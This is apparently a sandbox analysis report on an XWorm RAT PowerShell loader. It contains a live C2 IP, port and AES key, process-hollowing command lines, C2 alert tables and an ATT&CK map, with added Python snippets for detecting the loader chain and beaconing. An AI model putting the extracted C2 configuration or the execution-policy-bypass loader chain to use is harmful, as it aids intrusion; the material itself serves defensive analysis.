Windows
Analysis Report
b.ps1
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- powershell.exe (PID: 3716, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\b.ps1", MD5: 04029E121A0CFA5991749937DD22A1D9)
  - conhost.exe (PID: 5620, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - RegSvcs.exe (PID: 6568, cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe", MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    - WerFault.exe (PID: 3788, cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 880, MD5: C31336C1EFC2CCB44B4326EA793040F2)
  - wermgr.exe (PID: 7140, cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3716" "2640" "2540" "2656" "0" "0" "2660" "0" "0" "0" "0" "0", MD5: 74A0194782E039ACE1F7349544DC1CF4)
- cleanup
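The chain above is the endpoint-side signal worth alerting on: a script host started with `-ExecutionPolicy unrestricted`, then a .NET Framework utility (RegSvcs.exe) launched with no arguments at all, which then crashes into WerFault.exe. A legitimate RegSvcs.exe invocation always carries an assembly path; one with an empty argument list is a process waiting to be hollowed. The Python below is an added example and not part of the Joe Sandbox report. It runs that parent/child heuristic over process-creation events reconstructed from the tree above; the parent PID of powershell.exe (1000) and the final benign control event are constructed, and the list of other commonly abused .NET utilities beyond RegSvcs.exe is an assumption from general loader behaviour, not something this page shows.

```python
import re

# Script hosts whose children deserve scrutiny (powershell.exe is the one in this report).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# .NET Framework utilities used as hollowing targets by .NET loaders. Only RegSvcs.exe appears
# in this report; the others are an assumption based on common loader behaviour.
DOTNET_UTILITIES = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe", "applaunch.exe"}

# Constructed process-creation events mirroring the process tree above. The parent PID of
# powershell.exe (1000) and the last (benign) RegSvcs.exe event are constructed for the example.
EVENTS = [
    {"pid": 3716, "ppid": 1000,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\b.ps1"'},
    {"pid": 5620, "ppid": 3716,
     "image": r"C:\Windows\system32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"pid": 6568, "ppid": 3716,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"'},
    {"pid": 3788, "ppid": 6568,
     "image": r"C:\Windows\SysWOW64\WerFault.exe",
     "cmdline": r"C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 880"},
    {"pid": 7000, "ppid": 1000,  # constructed benign control: an assembly really being registered
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" C:\build\MyService.dll'},
]

# -ExecutionPolicy and its abbreviations (-ep, -ex, ...) followed by a permissive policy.
EXECPOLICY_OVERRIDE = re.compile(r"-e\w*\s+(?:bypass|unrestricted)\b", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def split_cmdline(cmdline):
    """Tokenise a Windows command line, keeping quoted paths with spaces intact."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def find_suspicious(events):
    """Return (pid, finding) pairs for the two behaviours visible in the report's process tree."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for ev in events:
        image = basename(ev["image"])
        args = split_cmdline(ev["cmdline"])[1:]
        if image in {"powershell.exe", "pwsh.exe"} and EXECPOLICY_OVERRIDE.search(ev["cmdline"]):
            findings.append((ev["pid"], "executionpolicy-override"))
        parent = by_pid.get(ev["ppid"])
        if (parent is not None and basename(parent["image"]) in SCRIPT_HOSTS
                and image in DOTNET_UTILITIES and not args):
            # A .NET utility started with nothing to do is a process waiting to be hollowed.
            findings.append((ev["pid"], "dotnet-utility-no-args-from-script-host"))
    return findings


if __name__ == "__main__":
    for pid, finding in find_suspicious(EVENTS):
        print(pid, finding)
```

The benign control event is there to show why the argument check matters: RegSvcs.exe with a DLL path is routine developer activity, and a rule that keys only on the image name would drown in it. The WerFault.exe child is also a useful corroborating signal (the hollowed host crashed, `-p 6568` names it), but on its own it is too noisy to alert on.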
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
XWorm | Malware with wide range of capabilities ranging from RAT to ransomware. | No Attribution | | |
{
"C2 url": [
"176.113.115.228"
],
"Port": 4412,
"Aes key": "P0WER",
"SPL": "<Xwormmm>",
"Install file": "USB.exe"
}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_XWorm | Yara detected XWorm | Joe Security | |
| MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen | |
| JoeSecurity_XWorm | Yara detected XWorm | Joe Security | |
| JoeSecurity_XWorm | Yara detected XWorm | Joe Security | |
| MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen | |
(6 entries in the original table, 5 preserved; the Source and Strings columns were not preserved.)
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_XWorm | Yara detected XWorm | Joe Security | |
| rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io | |
| MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen | |
| JoeSecurity_XWorm | Yara detected XWorm | Joe Security | |
| rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io | |
(10 entries in the original table, 5 preserved; the Source and Strings columns were not preserved.)
System Summary |
---|
Source: | Sigma rule (title not preserved) | Author: frack113 |
Source: | Sigma rule (title not preserved) | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-26T10:34:28.769948+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:34:36.918088+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:34:40.555436+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:34:52.350845+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:04.163753+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:06.917867+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:15.963703+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:25.653662+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:25.854717+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:26.619507+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:31.488042+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:31.901153+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:36.906588+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:41.125293+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:52.921008+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:56.558294+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:03.438235+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:03.562563+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:03.688443+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:03.811883+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:03.934237+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:06.915056+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:08.851433+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:08.974394+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:09.104641+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:09.576639+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:22.254524+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:22.255919+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:22.256062+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:22.256207+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:22.472568+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:24.397558+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:34.555246+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:35.219704+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:36.902304+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:47.007422+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:58.808052+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:37:04.368257+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:37:06.917682+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:37:07.432087+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:37:11.273258+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:37:23.070700+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:37:31.646275+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:37:31.767760+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:37:36.936336+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:37:43.523152+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-26T10:34:28.814226+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:34:40.558655+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:34:52.357325+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:04.166179+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:15.967787+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:25.655476+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:25.864086+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:26.643517+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:31.490610+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:31.946435+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:41.127120+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:52.923666+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:56.564382+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:03.442442+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:03.564213+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:03.689951+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:03.820321+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:03.942247+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:08.857621+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:08.976077+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:09.106351+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:09.578400+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:22.257763+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:22.474521+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:24.399249+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:34.559337+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:35.221750+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:47.011390+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:58.809874+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:37:04.373284+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:37:07.434211+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:37:11.275725+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:37:23.204297+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:37:31.648147+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:37:31.769145+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:37:43.537690+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-26T10:34:36.918088+0100 | 2858801 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-26T10:36:24.180863+0100 | 2858799 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
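The four tables above describe a single TCP flow, 192.168.2.5:49709 to 176.113.115.228:4412, that keeps alerting for about three minutes, with the client-to-C2 rule (SID 2852923) firing roughly every 11.8 seconds at the start. That regularity, combined with the report's "TCP traffic detected without corresponding DNS query" signature (the C2 is an IP literal from the config, never resolved), is the network-side shape of a RAT check-in. The Python below is an added example, not part of the Joe Sandbox report: it groups alert rows by flow and SID, measures the inter-alert interval and its jitter, and lists external peers that never appeared in a DNS answer. The embedded rows are a subset copied from the tables above; the DNS answer set is constructed as empty to match the report; the beacon thresholds are assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime
from statistics import median, pstdev

# Constructed input: the first five client->C2 rows (SID 2852923) and the first two
# C2->client rows (SID 2852870) copied from the Suricata tables in the report above.
ALERT_ROWS = """\
2025-01-26T10:34:28.814226+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:34:40.558655+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:34:52.357325+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:04.166179+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:15.967787+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:34:28.769948+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:34:36.918088+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
"""

# Constructed: IPs seen in DNS answers during the run. Empty, because the report states the
# C2 traffic had no corresponding DNS query.
RESOLVED_IPS = set()


def parse_row(line):
    """Split one pipe-delimited alert row into (timestamp, sid, src, sport, dst, dport)."""
    cols = [c.strip() for c in line.strip().strip("|").split("|")]
    ts = datetime.strptime(cols[0], "%Y-%m-%dT%H:%M:%S.%f%z")
    return ts, int(cols[1]), cols[4], int(cols[5]), cols[6], int(cols[7])


def flow_key(src, sport, dst, dport):
    """Direction-independent key so client->C2 and C2->client alerts land on the same flow."""
    return tuple(sorted([(src, sport), (dst, dport)]))


def beacon_stats(rows_text):
    """Per (flow, sid): alert count, median inter-alert gap in seconds, jitter as pstdev/median."""
    buckets = defaultdict(list)
    for line in rows_text.strip().splitlines():
        ts, sid, src, sport, dst, dport = parse_row(line)
        buckets[(flow_key(src, sport, dst, dport), sid)].append(ts)
    stats = {}
    for key, times in buckets.items():
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        med = median(gaps) if gaps else 0.0
        # Jitter needs at least two gaps to mean anything; None marks "not enough data".
        jitter = (pstdev(gaps) / med) if len(gaps) > 1 and med > 0 else None
        stats[key] = {"count": len(times), "median_gap": med, "jitter": jitter}
    return stats


def beacon_candidates(stats, min_alerts=4, max_jitter=0.2):
    """Flows whose alerts recur at a near-constant interval (thresholds are assumptions)."""
    return {k: v for k, v in stats.items()
            if v["count"] >= min_alerts and v["jitter"] is not None and v["jitter"] <= max_jitter}


def contacted_without_dns(stats, resolved_ips, internal_prefix="192.168."):
    """External peers reached by IP literal, i.e. never returned by a DNS answer."""
    peers = set()
    for flow, _sid in stats:
        for ip, _port in flow:
            if not ip.startswith(internal_prefix) and ip not in resolved_ips:
                peers.add(ip)
    return peers


if __name__ == "__main__":
    s = beacon_stats(ALERT_ROWS)
    for key, val in s.items():
        print(key, val)
    print("beacon-like:", list(beacon_candidates(s)))
    print("IP-literal peers:", contacted_without_dns(s, RESOLVED_IPS))
```

Keep the jitter threshold generous: the full 2852923 table shows the 11.8 s cadence breaking into sub-second bursts after the first minute, so the opening alerts of a flow are usually the cleanest signal and a rolling window over the first N alerts works better than statistics over the whole session.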
- AV Detection
- Compliance
- Spreading
- Networking
- Key, Mouse, Clipboard, Microphone and Screen Capturing
- System Summary
- Data Obfuscation
- Hooking and other Techniques for Hiding and Protection
- Malware Analysis System Evasion
- Anti Debugging
- HIPS / PFW / Operating System Protection Evasion
- Language, Device and Operating System Detection
- Lowering of HIPS / PFW / Operating System Security Settings
- Stealing of Sensitive Information
- Remote Access Functionality
AV Detection |
---|
Evidence type (source and value columns not preserved) | Entries |
---|---|
Malware Configuration Extractor | 1 |
Virustotal (Perma Link) | 1 |
Integrated Neural Analysis Model | 1 |
String decryptor | 6 |
Binary string | 48 |
File opened | 6 |
Networking |
---|
Evidence type (source and value columns not preserved) | Entries |
---|---|
Suricata IDS | 5 |
URLs | 1 |
TCP traffic | 1 |
ASN Name | 1 |
TCP traffic detected without corresponding DNS query | 50 |
String found in binary or memory | 12 |
Window created | 1 |
System Summary |
---|
Evidence type (source and value columns not preserved) | Entries |
---|---|
Matched rule | 14 |
Process Stats | 1 |
Code function | 9 (0_2_00007FF84900103D, 3_2_01506340, 3_2_0150C2D8, 3_2_0150B598, 3_2_015084B8, 3_2_01505A70, 3_2_01502C88, 3_2_01505728, 3_2_01500FA0) |
Process created | 1 |
Matched rule | 14 |
Cryptographic APIs | 6 |
Security API names | 4 |
Classification label | 1 |
File created | 1 |
Mutant created | 5 |
File created | 1 |
File read | 1 |
Key opened | 1 |
Virustotal | 1 |
Process created | 7 |
Section loaded | 52 |
Key value queried | 1 |
Window detected | 1 |
File opened | 1 |
Binary string | 48 |
Data Obfuscation |
---|
Source: | .Net Code: | ||
Source: | .Net Code: | ||
Source: | .Net Code: | ||
Source: | .Net Code: |
Source: | .Net Code: | ||
Source: | .Net Code: | ||
Source: | .Net Code: | ||
Source: | .Net Code: | ||
Source: | .Net Code: | ||
Source: | .Net Code: |
Source: | Code function: | 0_2_00007FF848F35829 | |
Source: | Code function: | 3_2_01508081 | |
Source: | Code function: | 3_2_01504CD1 |
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: |
Source: | Process information set: |
Malware Analysis System Evasion |
---|
Source: | WMI Queries: |
Source: | System information queried: |
Source: | Thread delayed: |
Source: | Window / User API: |
Source: | Thread sleep time: |
Source: | File opened: |
Source: | File Volume queried: |
Source: | Thread delayed: |
Source: | File opened: |
Source: | Binary or memory string: |
Source: | Process information queried: |
Source: | Process queried: |
Source: | Process token adjusted: |
Source: | Memory allocated: |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Memory written: |
Source: | Process created: |
Source: | Queries volume information: |
Source: | Key value queried: |
Source: | Binary or memory string: |
Source: | WMI Queries: |
Stealing of Sensitive Information |
---|
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Windows Management Instrumentation | 1 DLL Side-Loading | 211 Process Injection | 1 Masquerading | OS Credential Dumping | 241 Security Software Discovery | Remote Services | 11 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 1 Clipboard Data | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 241 Virtualization/Sandbox Evasion | Security Account Manager | 241 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 211 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Obfuscated Files or Information | Cached Domain Credentials | 23 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
